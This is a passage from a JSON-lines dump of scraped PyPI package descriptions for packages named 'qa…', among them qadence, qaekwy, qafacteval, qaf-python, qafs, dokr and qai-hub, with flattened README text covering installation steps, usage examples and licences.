individual extras, use the following syntax (IMPORTANTMake sure to use quotes):pipinstall\"qadence[braket,pulser,visualization]\"To install all available extras, simply do:pipinstall\"qadence[all]\"IMPORTANTBefore installingqadencewith thevisualizationextra, make sure to install thegraphvizpackage\non your system:# For Debian-based distributions (e.g. 
Debian, Ubuntu)sudoaptinstallgraphviz# on MacOSbrewinstallgraphviz# via condacondainstallpython-graphvizContributingBefore making a contribution, please review ourcode of conduct.Submitting Issues:To submit bug reports or feature requests, please use ourissue tracker.Developing in qadence:To learn more about how to develop withinqadence, please refer tocontributing guidelines.Setting up qadence in development modeWe recommend to use thehatchenvironment manager to installqadencefrom source:python-mpipinstallhatch# get into a shell with all the dependenciespython-mhatchshell# run a command within the virtual environment with all the dependenciespython-mhatchrunpythonmy_script.pyWARNINGhatchwill not combine nicely with other environment managers such as Conda. If you still want to use Conda,\ninstall it from source usingpip:# within the Conda environmentpython-mpipinstall-e.CitationIf you use Qadence for a publication, we kindly ask you to cite our work using the following BibTex entry:@article{qadence2024pasqal,\n title ={Qadence: a differentiable interface for digital-analog programs.},\n author={Dominik Seitz and Niklas Heim and Jo\u00e3o P. Moutinho and Roland Guichard and Vytautas Abramavicius and Aleksander Wennersteen and Gert-Jan Both and Anton Quelle and Caroline de Groot and Gergana V. Velikova and Vincent E. Elfving and Mario Dagrada},\n journal={arXiv:2401.09915},\n url ={https://github.com/pasqal-io/qadence},\n year ={2024}}LicenseQadence is a free and open source software package, released under the Apache License, Version 2.0."} +{"package": "qadence-libs", "pacakge-description": "Qadence-LibsQadence-Libsis a Python package that provides extra functionality for Qadence.Installation guidePyPIand can be installed usingpipas follows:pipinstallqadence_libsContributingBefore making a contribution, please review ourcode of conduct.Submitting Issues:To submit bug reports or feature requests, please use ourissue tracker.Developing in qadence:To learn more about how to develop withinqadence, please refer tocontributing guidelines.Setting up qadence in development modeWe recommend to use thehatchenvironment manager to installqadence_libsfrom source:python-mpipinstallhatch# get into a shell with all the dependenciespython-mhatchshell# run a command within the virtual environment with all the dependenciespython-mhatchrunpythonmy_script.pyWARNINGhatchwill not combine nicely with other environment managers such as Conda. 
If you still want to use Conda,\ninstall it from source usingpip:# within the Conda environmentpython-mpipinstall-e.CitationIf you use Qadence-Libs for a publication, we kindly ask you to cite our work using the following BibTex entry:@misc{qadence-libs2024pasqal,\n url ={https://github.com/pasqal-io/qadence-libs},\n title ={Qadence Libs:{A}n{E}xperiment runner for Qadence.},\n year ={2023}}LicenseQadence-Libs is a free and open source software package, released under the Apache License, Version 2.0."} +{"package": "qadence-protocols", "pacakge-description": "Qadence-ProtocolsQadence-Protocolsis a Python package that provides extra functionality for Qadence.Installation guidePyPIand can be installed usingpipas follows:pipinstallqadence_protocolsContributingBefore making a contribution, please review ourcode of conduct.Submitting Issues:To submit bug reports or feature requests, please use ourissue tracker.Developing in qadence:To learn more about how to develop withinqadence, please refer tocontributing guidelines.Setting up qadence in development modeWe recommend to use thehatchenvironment manager to installqadence_protocolsfrom source:python-mpipinstallhatch# get into a shell with all the dependenciespython-mhatchshell# run a command within the virtual environment with all the dependenciespython-mhatchrunpythonmy_script.pyWARNINGhatchwill not combine nicely with other environment managers such as Conda. If you still want to use Conda,\ninstall it from source usingpip:# within the Conda environmentpython-mpipinstall-e.CitationIf you use Qadence-Protocols for a publication, we kindly ask you to cite our work using the following BibTex entry:@misc{qadence-protocols2024pasqal,\n url ={https://github.com/pasqal-io/qadence-protocols},\n title ={Qadence Protocols:{A}n{E}xperiment runner for Qadence.},\n year ={2023}}LicenseQadence-Protocols is a free and open source software package, released under the Apache License, Version 2.0."} +{"package": "q-a-dependencies", "pacakge-description": "UNKNOWN"} +{"package": "qadre", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qaekwy", "pacakge-description": "Qaekwy Python ClientOperational Research at your fingertips.The Qaekwy Python Client serves as a powerful tool to interact with the Qaekwy optimization\nsolver engine through its API. This client provides a convenient and programmatic way tocreate,model, andsolveoptimization problems using Qaekwy, streamlining\nthe process offormulating complex problems and finding optimal solutions.Qaekwy is small optimization problem solver engine designed to tackle a wide range of\nreal-world challenges. It provides powerful modeling capabilities and efficient solving\nalgorithms to find optimal solutions to complex problems.FeaturesModeling Made Easy:Define variables, constraints, and objective functions seamlessly.\nQaekwy'sModellerclass helps you create optimization models with clarity and precision.Diverse Constraint Support:Qaekwy supports various constraint types, from simple arithmetic\nto complex mathematical expressions. Create constraints that accurately represent real-world scenarios.Effortless Optimization:Qaekwy abstracts away the complexities of communication with\noptimization engine. Send requests and receive responses using intuitive methods.Flexibility: You can leverage the Qaekwy Python Client to tailor optimization problems to their specific\nneeds by utilizing Qaekwy's modelling capabilities. 
This includes handling various types of constraints,\nobjectives, and solver algorithms.InstallationpipinstallqaekwyDocumentationExplore theQaekwy Documentationfor in-depth guides, examples, and usage details.ExampleHow to use the Qaekwy Python Client to solve a very small optimization problem:fromqaekwy.engineimportDirectEnginefromqaekwy.model.constraint.relationalimportRelationalExpressionfromqaekwy.model.specificimportSpecificMaximumfromqaekwy.model.variable.integerimportIntegerVariablefromqaekwy.model.modellerimportModellerfromqaekwy.model.searcherimportSearcherType# Define the optimization problem using Qaekwy Python ClientclassSimpleOptimizationProblem(Modeller):def__init__(self):super().__init__()# Create a integer variablesx=IntegerVariable(var_name=\"x\",domain_low=0,domain_high=10)y=IntegerVariable(var_name=\"y\",domain_low=0,domain_high=10)z=IntegerVariable(var_name=\"z\",domain_low=0,domain_high=10)# Constraintsconstraint_1=RelationalExpression(y>2*x)constraint_2=RelationalExpression(x>=4)constraint_3=RelationalExpression(z==y-x)# Objective: Maximize zself.add_objective(SpecificMaximum(variable=z))# Add variable and constraint to the problemself.add_variable(x)self.add_variable(y)self.add_variable(z)self.add_constraint(constraint_1)self.add_constraint(constraint_2)self.add_constraint(constraint_3)# Set the search strategyself.set_searcher(SearcherType.BAB)# Create a Qaekwy engine for interaction with the freely-available Cloud instanceqaekwy_engine=DirectEngine()# Create the optimization problem instanceoptimization_problem=SimpleOptimizationProblem()# Request the Qaekwy engine to solve the problemresponse=qaekwy_engine.model(model=optimization_problem)# Retrieve the list of solutions from the responselist_of_solutions=response.get_solutions()# Print the solution(s) obtainedforsolutioninlist_of_solutions:print(f\"Optimal solution: x ={solution.x}\")print(f\"Optimal solution: y ={solution.y}\")print(f\"Optimal solution: z ={solution.z}\")Output:Optimal solution: x = 4\nOptimal solution: y = 10\nOptimal solution: z = 6LicenseThis software is licensed under theEuropean Union Public License v1.2"} +{"package": "qa-engine", "pacakge-description": "QA engineOMBot\u9879\u76ee\u7684QA\u5f15\u64ce\uff0c\u63d0\u4f9b\u9879\u76ee\u95ee\u7b54\u529f\u80fd\u4f7f\u7528\u65b9\u6cd51. \u89e6\u53d1\u95f2\u804a\u6a21\u5f0ffromqa_engineimportQAEnginefromombot_utils.schemasimportChatRecordsif__name__=='__main__':qa=QAEngine()records={\"bot_id\":\"2\",\"session_id\":\"string\",\"callback\":\"string\",\"messages\":[{\"role\":\"user\",\"message_type\":\"image\",\"src_type\":\"url\",\"content\":\"https://minio/hzlh/omintel/cess/c25f30559b974c728e5dbe1d4177aa5a.jpg\",\"objects\":[]},{\"role\":\"user\",\"message_type\":\"text\",\"src_type\":\"text\",\"content\":\"\u4f60\u597d\uff0c\u8bf7\u95ee\u4f60\u662f\u8c01\uff1f\",\"objects\":[]}]}records=ChatRecords(**records)qa.run(bot_id=\"2\",chat_records=records)1. 
\u89e6\u53d1\u4e13\u4e1a\u6a21\u5f0ffromqa_engineimportQAEnginefromombot_utils.schemasimportChatRecordsif__name__=='__main__':qa=QAEngine()records={\"bot_id\":\"2\",\"session_id\":\"string\",\"callback\":\"string\",\"messages\":[{\"role\":\"user\",\"message_type\":\"image\",\"src_type\":\"url\",\"content\":\"https://minio/hzlh/omintel/cess/c25f30559b974c728e5dbe1d4177aa5a.jpg\",\"objects\":[]},{\"role\":\"user\",\"message_type\":\"text\",\"src_type\":\"text\",\"content\":\"\u89c6\u9891\u4e2d\u6709\u4eba\u6454\u5012\u5417\uff1f\",\"objects\":[]}]}records=ChatRecords(**records)qa.run(bot_id=\"2\",chat_records=records)"} +{"package": "qa-e-nsi", "pacakge-description": "Assurance qualit\u00e9 sur les productions e-nsiComme nous sommes tr\u00e8s assur\u00e9s \u00e0 la qualit\u00e9 des exercices produits par le group de travaile-nsi, nous avons souhait\u00e9 d\u00e9velopper un outil pour automatiser un certain nombre de v\u00e9rification."} +{"package": "qaenv", "pacakge-description": "QA Environment"} +{"package": "qaes", "pacakge-description": "No description available on PyPI."} +{"package": "qaeval", "pacakge-description": "No description available on PyPI."} +{"package": "qafacteval", "pacakge-description": "QAFactEval: Improved QA-Based Factual Consistency Evaluation for SummarizationThis is the official code repository for the NAACL 2022 paperQAFactEval: Improved QA-Based Factual Consistency Evaluation for SummarizationbyAlexander R. Fabbri,Chien-Sheng Wu,Wenhao Liu, andCaiming Xiong.In our paper, we conduct an extensive comparison of the components of QA-based metrics for factual consistency evaluation in summarization. Our optimized metric builds onQAEvalwith question consistency filtering and an improved answer overlap metric, leading to a 14% average improvement over previous QA-based metrics on theSummaCfactual consistency benchmark.Table of ContentsUpdatesUsing QAFactEvalCitationLicenseUpdates5/2/2022- Initial commit! :)Using QAFactEvalYou can install qafacteval via pip:pipinstallqafactevalYou can also install from source:gitclonehttps://github.com/salesforce/QAFactEvalcdQAFactEval\npipinstall-e.For use in scriptsDownload the required pretrained models usingdownload_models.sh.Seerun.pyfor an example of using the QAFactEval metric:fromqafactevalimportQAFactEvalkwargs={\"cuda_device\":0,\"use_lerc_quip\":True,\\\"verbose\":True,\"generation_batch_size\":32,\\\"answering_batch_size\":32,\"lerc_batch_size\":8}model_folder=\"\"# path to models downloaded with download_models.shmetric=QAFactEval(lerc_quip_path=f\"{model_folder}/quip-512-mocha\",generation_model_path=f\"{model_folder}/generation/model.tar.gz\",answering_model_dir=f\"{model_folder}/answering\",lerc_model_path=f\"{model_folder}/lerc/model.tar.gz\",lerc_pretrained_model_path=f\"{model_folder}/lerc/pretraining.tar.gz\",**kwargs)results=metric.score_batch([\"This is a source document\"],[[\"This is a summary.\"]],return_qa_pairs=True)score=results[0][0]['qa-eval']['lerc_quip']CitationWhen referencing this repository, please citethis paper:@misc{fabbri-etal-2022-qafacteval,title={QAFactEval: Improved QA-Based Factual Consistency Evaluation for Summarization},author={Alexander R. 
Fabbri and Chien-Sheng Wu and Wenhao Liu and Caiming Xiong},year={2022},eprint={2112.08542},archivePrefix={arXiv},primaryClass={cs.CL},url={https://arxiv.org/abs/2112.08542},}LicenseThis repository is released under theBSD-3 License."} +{"package": "qaffeine", "pacakge-description": "qaffeineLittle tool that prevents your computer from entering inactivity modes. Can run in a terminal or in the notification area. Written in Python 3 and Qt 5.Compatible with Linux, OS/X and Windows.RequirementsPython 3PySide2pyautoguiInstallationUsing PIP#pip3 install qaffeineThis will pull the dependencies automatically.Using the setup.py supplied in the source tree#python3 setup.py installUsageCommand lineSyntax:$ qaffeine-cli -h\nusage: Prevent computer inactivity by simulating key presses\n [-h] [-n] [-d DELAY] [-k KEY] [-v]\n\noptional arguments:\n -h, --help show this help message and exit\n -n, --nogui Don't start a GUI, only a operate in text mode\n -d DELAY, --delay DELAY\n Delay between key presses in seconds [default: 5] -\n only valid with --nogui\n -k KEY, --key KEY Key to press [default: altright]; see keys.txt for a\n list of valid values - only valid with --nogui\n -v, --version Show version number and exitGUIRunning qaffeine without any argument starts the graphical interface. Qaffeine then runs in the notification area."} +{"package": "qaf-python", "pacakge-description": "QAF-Python Automation FrameworkThe QAF-Python Automation Framework is designed to facilitate functional test automation for various platforms,\nincluding Web, Mobile Web, Mobile Hybrid apps, Mobile Native apps, and web services. It offers a comprehensive set of\nfeatures for driver and resource management, data-driven testing, and BDD support using QAF BDD2. The framework is built\non Python 3.x and seamlessly integrates with popular tools like pytest, WebDriver, and Appium.Installationpip install git+https://github.com/qmetry/qaf-python.git@masterRun Testpytest []Quick ExampleSteps file:proj/steps/commonsteps.pyfromqaf.automation.bdd2import*fromqaf.automation.step_def.common_stepsimport*@step(\"user is on application home\")defopen_app():get(\"/\")@step(\"login with{username}and{password}\")deflogin(username,password):sendKeys(\"username.txt.ele\",username)sendKeys(\"password.txt.ele\",password)click(\"login.btn.ele\")You have the flexibility to write your tests usingeitherPython as pytestorin a behavior-driven development (\nBDD)\nstyle. 
This allows you to choose the approach that best suits your preferences and project requirements.Testcase authoring in BDDBDD file:features/login.feature@web@mobile@storyKey:PRJ001@module:loginFeature:Login functionality@smoke@testCaseId:TC001Scenario:user should be able to login into applicationGivenuser is on application homeWhenlogin with '${valid.user.name}' and '${valid user.password}'Thenverify 'logout.btn.ele' is present@datafile:resources/${env.name}/logindata.csvScenario:user should be able to login into applicationGivenuser is on application homeWhenlogin with '${user-name}' and '${password}'Thenverify 'error.text.ele' text is '${error-msg}'Run testsYou can run BDD same as running normal pytestpytestfeatures# all files from features directorypytestfeatures/login.feature# single filepytestfeatures--dryrun# dry-run modeyou can use pytest mark or qaf metadata filter.pytestfeatures-mweb--metadata-filter\"module == 'login' and storyKey in ['PRJ001', 'PRJ005']\"Test case authoring in python script (pytest)fromqaf.automation.step_def.common_stepsimportverify_present,verify_textfromproj.steps.commonstepsimport*@pytest.mark.web@pytest.mark.mobile@metadata(storyKey=\"TC001\",module=\"login\")classloginFunctionality:@metadata(\"smoke\",testCaseId=\"TC001\")deftest_login():open_app()login(getBundle().get_string('valid.user.name'),getBundle().get_string('valid.user.password'))verify_present(None,'logout.btn.ele')@dataprovider(datafile=\"resources/${env.name}/logindata.csv\")deftest_login(testdata):open_app()login(testdata.get('user-name'),testdata.get('password'))verify_text(None,'error.text.ele',testdata.get('error-msg'))run testsame as running normal pytest with additional meta-data filter as shown in example aboveFeaturesHere is list of features in addition to features supported by pytestWeb, Mobile, and Web Services Testing: The framework supports test automation for Web applications, Mobile Web,\nMobile Hybrid apps, Mobile Native apps, and web services. It provides a unified solution for testing different\nplatforms.Configuration Management: The framework offers robust configuration management capabilities. It supports various\nconfiguration file formats such asini,properties,wsc,loc,locj, andwscj. This allows you to manage and organize\nyour test configuration efficiently.Driver Management: The framework simplifies the management of WebDriver and Appium drivers. It supports on-demand\ndriver session creation and automatic teardown, making it easy to without worring of set up and clean up driver\nsessions. You can configure the driver properties through properties files, enabling flexibility in driver\nconfiguration.Driver and Element Command Listeners: The framework allows you to register driver command listeners and element\ncommand listeners. This feature enables you to intercept and modify driver and element commands, facilitating custom\nbehavior and extensions.Support for Multiple Driver Sessions: QAF-Python supports multiple driver sessions in the same test. This means\nyou can test scenarios that involve multiple browser instances or multiple mobile devices simultaneously.Wait/Assert/Verify Functionality: The framework provides convenient methods for waiting, asserting, and verifying\nelement states. It includes automatic waiting capabilities, ensuring synchronization between test steps and\napplication behavior.Locator Repository: QAF-Python includes a locator repository for managing web and mobile element locators. 
The\nrepository allows you to store and organize element locators, making them easily accessible and reusable across tests.Request Call Repository: For testing web services, the framework provides a repository for managing web service\nrequest calls. You can store and manage your API requests, making it convenient to handle different API scenarios and\npayloads.Data-Driven Testing: QAF-Python supports data-driven testing by integrating with CSV and JSON data files. You can\nparameterize your tests and iterate over test data, enabling you to run tests with different input values and expected\nresults.Native Pytest Implementation of QAF-BDD2: The framework offers a native implementation of QAF-BDD2 in pytest. This\nallows you to write BDD-style tests using the Given-When-Then syntax and organize them into feature files. You can use\nmetadata annotations and tags to categorize and filter tests based on criteria such as story key, module, and more.Step Listener with Retry Step Capability: QAF-Python includes a step listener that provides retry capabilities for\ntest steps. If a step fails, the framework can automatically retry the step for a specified number of times, enhancing\nthe robustness of your tests.Dry Run Support: You can perform a dry run of your tests using the framework. This allows you to check the test\nexecution flow, identify any errors or issues, and ensure that the tests are set up correctly before running them for\nreal.Metadata Support with Metadata Filter: QAF-Python supports metadata annotations and filters. You can assign\nmetadata to tests, such as story key, module, or custom tags, and use metadata filters to selectively run tests based\non specific criteria.Detailed Reporting: The framework provides detailed reporting capabilities, giving you insights into test\nexecution results. You can generate comprehensive reports that include test status, step-level details, screenshots,\nand other relevant information.Repository Editor: QAF offers a repository editor tool that allows you to create and update the locator\nrepository and request call repository easily. The editor provides a user-friendly interface for managing and\norganizing your locators and API requests. You can\nuserepository editorto create/update locator\nrepository and request call repository.Driver Management benefitsThe framework simplifies the management of WebDriver and Appium drivers. It supports on-demand driver session creation\nand automatic teardown, making it easy to set up and clean up driver sessions. This feature allows you to focus on\nwriting test scripts rather than dealing with driver setup and cleanup processes.On-Demand Driver Session Creation: With the framework's on-demand driver session creation, framework dynamically\ncreates driver instances whenever you need them during test execution. This ensures that the drivers are available\nprecisely when required, reducing resource wastage and enhancing test execution efficiency.Automatic Teardown: After test execution or when a test session ends, the framework automatically tears down the\ndriver sessions. This cleanup process prevents any potential resource leaks and optimizes the utilization of testing\nresources.Driver Configuration via Properties Files: The framework allows you to configure driver through properties files.\nThis approach provides a convenient and organized way to manage various driver settings, such as browser preferences,\ntimeouts, and capabilities, in separate configuration files. 
It makes the driver configuration process more manageable and less error-prone.

Flexibility in Driver Configuration: By using properties files for driver configuration, you gain flexibility in customizing the driver behavior. You can easily update the properties files to modify driver settings without modifying the test scripts, which enhances maintainability and reusability of your automation code.

The Driver Management feature in the framework streamlines the process of working with WebDriver and Appium drivers. It ensures that driver sessions are readily available when needed and automatically handles cleanup after test execution. Additionally, the flexibility in driver configuration through properties files simplifies the management of driver settings, improving the overall efficiency and organization of your test automation process.

Properties used by framework (Key - Usage):

selenium.wait.timeout - Default wait time used by the framework's wait/assert/verify methods
remote.server - Remote server URL, which will be considered if a remote driver is configured, e.g. http://localhost:, localhost, 127.0.0.1, etc.
remote.port - Remote server port, which will be considered if a remote driver is configured
driver.name - Driver to be used, for instance firefoxDriver or firefoxRemoteDriver etc.
driver.capabilities - Specify an additional capability by name with this prefix that is applicable to any driver.
driver.additional.capabilities - Specify multiple additional capabilities as a map that are applicable to any driver
{0}.additional.capabilities - Specify multiple additional capabilities as a map that are applicable to a specific driver. For example, chrome.additional.capabilities.
{0}.capabilities - Specify an additional capability by name with this prefix that is applicable to a specific driver. For example, chrome.capabilities.
env.baseurl - Base URL of the AUT to be used.
env.resources - File or directory to load driver-specific resources, for instance driver-specific locators.
wd.command.listeners - List of web driver command listeners (fully qualified class names that subclass qaf.automation.ui.webdriver.abstract_listener.DriverListener) to be registered.
we.command.listeners - List of web element command listeners (fully qualified class names that subclass qaf.automation.ui.webdriver.abstract_listener.ElementListener) to be registered.
ws.command.listeners - List of web service command listeners (fully qualified class names that subclass qaf.automation.ws.rest.ws_listener.WsListener) to be registered.
env.default.locale - Locale name from the loaded locales that should be treated as the default locale
testing.approach - e.g. behave, pytest

License

This project is licensed under the MIT License.

Acknowledgements

We would like to thank the pytest community for their excellent work in developing a robust and extensible testing framework. Their contributions have been invaluable in building this enhanced test automation framework."} +{"package": "qafs", "pacakge-description": "Quality Aware Feature Store - Simple and scalable feature store with data quality checks. Feature stores aim to solve the data management problems that arise when building Machine Learning applications. However, data quality is a component which data teams need to integrate and handle as a separate component.
This project join both concepts keeping the data quality closely coupled with data transformations making necessary a minimal data verification check and possibiliting the data/transformations check evolve during the projects.For thatqafshave a strong dependecy withpanderato build the data validations.FeaturesPandas-like APIFeatures information stored in database along with metadata.Dask to process large datasets in a cluster enviroment.Data is stored as timeseries inParquet format, store in filesystem or object storage services.Store transformations as feature.Get StartedInstalling the python package through pip:$pipinstallqafsBellow is an example of usageqafswhere we'll create a feature store and registernumbersfeature and ansquaredfeature transformation. First we need import the packages and create the feature store, for this example we are using sqlite database and persisting the features in the filesystem:importqafsimportpandasaspdimportpanderaaspafrompanderaimportCheck,Column,DataFrameSchemafrompanderaimportiofs=qafs.FeatureStore(connection_string='sqlite:///test.sqlite',url='/tmp/featurestore/example')Features could be stored in namespaces, it help organize the data. When creatingnumberswe specify the'example/numbers'feature to point the featurenumbersat that namespaceexamplehowever we can use the argumentsname='numbers', namespace='example'as well. The we specify the data validation usingpanderatelling that feature isIntegerand the values should begreater than 0:fs.create_namespace('example',description='Example datasets')fs.create_feature('example/numbers',description='Timeseries of numbers',check=Column(pa.Int,Check.greater_than(0)))dts=pd.date_range('2020-01-01','2021-02-09')df=pd.DataFrame({'time':dts,'numbers':list(range(1,len(dts)+1))})fs.save_dataframe(df,name='numbers',namespace='example')To register oursquaredtransformation feature we're using the annotationfs.transformand fetching the data from thenumbersfeature applying the same data validation fromnumbers:@fs.transform('example/squared',from_features=['example/numbers'],check=Column(pa.Int,Check.greater_than(0)))defsquared(df):returndf**2When fetch our features we should see:df_query=fs.load_dataframe(['example/numbers','example/squared'],from_date='2021-01-01',to_date='2021-01-31')print(df_query.tail(1))##----# example/numbers example/squared# time# 2021-01-31 397 157609##----ContributingPlease follow theContributingguide.LicenseGPL-3.0 LicenseThis project started using the as basebytehub feature storeand is under the same license."} +{"package": "qafunnypet", "pacakge-description": "qafunnypetInstall qafunnypet from PyPi.pipinstallqafunnypetExamplefromqafunnypetimportQafunnypetclassDog(Qafunnypet):def__init__(self,name,age,color=None):super().__init__(name,age)self.color=colordefpresent(self):ifself.colorisNone:passelse:print(f\"I am{self.name}and I am{self.age}years old and I am{self.color}\")defspeak(self):print(\"Bark\")>>>doggy=Dog(\"Tim\",15,\"Bronw\")>>>doggy.present()>>>doggy.speak()>>>some=Qafunnypet(\"Cuasi\",10)>>>some.present()>>>some.speak()"} +{"package": "qaga", "pacakge-description": "No description available on PyPI."} +{"package": "qa-genie", "pacakge-description": "QA GenieEnglish |\u0939\u093f\u0902\u0926\u0940QA Genie is a Python package designed for generating questions and answers from unstructured data.This package is built using the unofficial API of HuggingChat:hugchat. 
It leverages HuggingChat's capabilities for question and answer generation.NoteThis package is in its alpha release and more functionality will be added soon!Update 1.0.0a3:This update enables the user to adjust iteration time. (Solves #1)Update 1.0.0a4:Enables user to get raw text output from chatbot for manual cleaning. Also fixes bugs in cleaning.Installationpipinstallqa_genieorpip3installqa_genieUsageemail=\"your_email@example.com\"# huggingface account emailpassword=\"your_password\"# huggingface account passwordmodel=\"meta\"# use \"meta\" to use meta-llama/Llama-2-70b-chat-hf or \"oasst\" to use OpenAssistant/oasst-sft-6-llama-30b# Initialize chatbotchatbot=get_generator(email,password,model)# Example usage with a single texttext=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\"result_single=extract_qa(chatbot,text,num_qn=3)# returns pandas.DataFrame with num_qn questions and answers# Example usage with multiple textstexts=[\"Text 1\",\"Text 2\",\"Text 3\"]result_multiple=extract_qas(chatbot,texts,num_qn_each=3)# return pandas.DataFrame with num_qn_each questions and answers generated for each textImportant NoteAs mentioned bySoulter, Server resources are precious, it is not recommended to request this API in a high frequency.ContributingFeel free to contribute to QA Genie by creating issues, submitting pull requests, or suggesting improvements. Your contributions are highly appreciated :)"} +{"package": "qahal", "pacakge-description": "Date:2022-01-24Version:1.0.0Authors:Mohammad Alghafli State machine with variables within states.This library was made to make it easier to make a menu and keep track of where\nthe user is within the menu."} +{"package": "qa-helper", "pacakge-description": "dokr - Make your docker and ecs tasks easyA Helper pip package for docker and ECS tasks. This pip package helps you automate your CI/CD pipeline. If your using docker and Amazon ECS for deployments, this tool can be really helpful. This package uses aws cli and ecs cli. MakAssumptions:Assuming python is installed on your system.Docker is installed on your systemaws-cliis installed and credentials are configured on your system.ecs-cliis installed on system [For Log Command only]Installdokron your system using :pip install dokrECS Optionslogin into ecs directly (Assuming awscli is installed and configured)dokr ecs loginDeploy an image on a clusterdokr ecs deploy --cluster cluster_name --service service_name --tag image_versionCheck ecs running logs of a Task - this command will ask for cluster/service and task defination.Note:Install ecs-cli before running this command from here:https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_CLI_installation.htmldokr ecs logDocker Helper CommandsPrune whole system - Cleans unused images, containers and volumes.dokr dock --clean-allDelete all the images matching the patterndokr dock --clean pattern_xxxAdd a tag to the existing image matching the provided pattern (for latest tag only)dokr dock --tag pattern_xxx tag_namePush all images on a system matching a patternThis will push all images matching pattern 'pat'dokr dock --push patAWS CommandsCheck current public ip of a machine on AWSdokr aws --ip jenkinsRun Apps (subsitute todocker runcommand and DockerCompose)Configure your default values(like docker registry, port mapping, volume mapping etc. 
that will be same for all apps):Add an new app for deployment:Run all configured apps:Run a particular app from ECR tags:Run a particular app by providing a tag:Development:Clean ununsed:rm -rf build/ dist/ *egg* **.pyc __pycache__Build package:python setup.py bdist_wheeldeploy package:python -m twine upload dist/*follow this link for more detailshttps://dzone.com/articles/executable-package-pip-install"} +{"package": "qai", "pacakge-description": "library.qai.utilitiesHelper functions and classes for interacting with the rest of the Writer platform. The main components are:qai.issues.make_issue: makes a dictionary that conforms to Writer platform standardsqai.spacy_factor.SpacyFactor: a helper class which turns a spaCy Span into an issueqai.server.QRest: a helper class which builds a Sanic REST server for youqai.validation.Validator: a simple validator class that can be used to skip segments without processing them, e.g. for being empty or having HTML. You would only want to import this yourself if you aren't usingQRestIf you are building a Sanic app without usingQRest, you still may be interested in the following middleware:qai.server.set_valid_segments: stores valid segments torequest.ctx.segmentsand also setsrequest.ctx.infoqai.server.postprocess_issues: changes the string indexing to be utf-16 based, and filters no ops(See GitHub history for older docs - QAI used to do a lot more!)Upgrading to v5Analyzerclass must now be callable. It will be passed(segment: str, meta: dict, all_info: dict)-segmentis the string to analyze,metais themetaobject that was sent, or{}if none was sent, andall_infois the entire payload the server received - in case you need access to clientID or something. Feel free to definedef __call__(self, segment: str, meta: dict, _)if you don't expect to need the request.QRestcan be passed a Sanic app, or be passed a dictionary which maps issue types to categories (in addition to the default behavior). This is useful for services that handle multiple categories, for which the default behavior doesn't work.QAI has a simpler structure, so all imports look differentConfigs, Strings, Storage, and Document are gone. The later 2 because they aren't needed anymore, the former 2 because you should manage that yourself. Whitelisting is also gone - just don't make the issues if you don't want them.All issues are created in the v2 format (meaning, the format we switched to after new segmentation - definedhere)By default, issuefromanduntilkeys are now based on UTF-16 indexing, to make things easier for JS. We add_from_pand_until_pkeys for debugging, which are the Python string indexes. This happens as response middleware in QRest.UsageYou can explicitly create a REST connection like this:fromappimportAnalyzerfromqai.serverimportQRest# setting the category / service name does nothing# we use the category passed on the requestcategory='service_name'host='0.0.0.0'port=5000if__name__=='__main__':analyzer=Analyzer()rest_connection=QRest(analyzer,category=category,host=host,port=port)# create a blocking connection:rest_connection.connect()The above will createas many workers as you have cores.This is great, sometimes. For example, there is a known bug where AutoML crashes if you are using more than one worker. 
So passworkers=1if this happensThere is also a helper class for turning spaCySpans into issues the rest of the platform can process:fromspacy.tokensimportSpanfromqai.spacy_factorimportSpacyFactorMyFactor=SpacyFactor(\"subject_object_verb_spacing\",\"Keep the subject, verb, and object of a sentence close together to help the reader understand the sentence.\")Span.set_extension(\"score\",default=0)Span.set_extension(\"suggestions\",default=[])doc=nlp(\"Holders of the Class A and Class B-1 certificates will be entitled to receive on each Payment Date, to the extent monies are available therefor (but not more than the Class A Certificate Balance or Class B-1 Certificate Balance then outstanding), a distribution.\")score=analyze(doc)ifscoreisnotNone:span=Span(doc,0,len(doc))# or whichever tokens/spans are the issue (don't have to worry about character indexes)span._.score=scorespan._.suggestions=get_suggestions(doc)issue=MyFactor(span)Installationpip install qaiorpoetry add qaiTestingSee Confluence for docs on input format expectations.scripts/test_qai.shhas some helpful testing functions.CI/CDGitHub Actions will push to PyPi when you merge into themainbranch.LicenseThis software is not licensed. If you do not work at Writer, you are not legally allowed to use it. Also, it's just helper functions that really won't help you. If something in it does look interesting, and you would like access or our help, open an issue."} +{"package": "qai-core", "pacakge-description": "Core library and modules for QRevMetadata"} +{"package": "qai-hub", "pacakge-description": "Qualcomm\u00ae AI Hubsimplifies deploying AI models\nfor vision, audio, and speech applications to edge devices.helps to optimize, validate,\nand deploy machine learning models on-device for vision, audio, and speech use\ncases.With Qualcomm\u00ae AI Model Hub, you can:Convert trained models from frameworks like PyTorch for optimized on-device performance on Qualcomm\u00ae devices.Profile models on-device to obtain detailed metrics including runtime, load time, and compute unit utilization.Verify numerical correctness by performing on-device inference.Easily deploy models using Qualcomm\u00ae AI Engine Direct or TensorFlow Lite.qai_hubis a python package that provides an API for users to upload a\nmodel, submit the profile jobs for hardware and get key metrics to optimize the\nmachine learning model further.Installation with PyPIThe easiest way to installqai_hubis by using pip, runningpip install qai-hubFor more information, check out thedocumentation.LicenseCopyright (c) 2023, Qualcomm Technologies Inc. All rights reserved."} +{"package": "qai-hub-models", "pacakge-description": "Qualcomm\u00ae AI Hub ModelsTheQualcomm\u00ae AI Hub Modelsare a collection of\nstate-of-the-art machine learning models optimized for performance (latency,\nmemory etc.) 
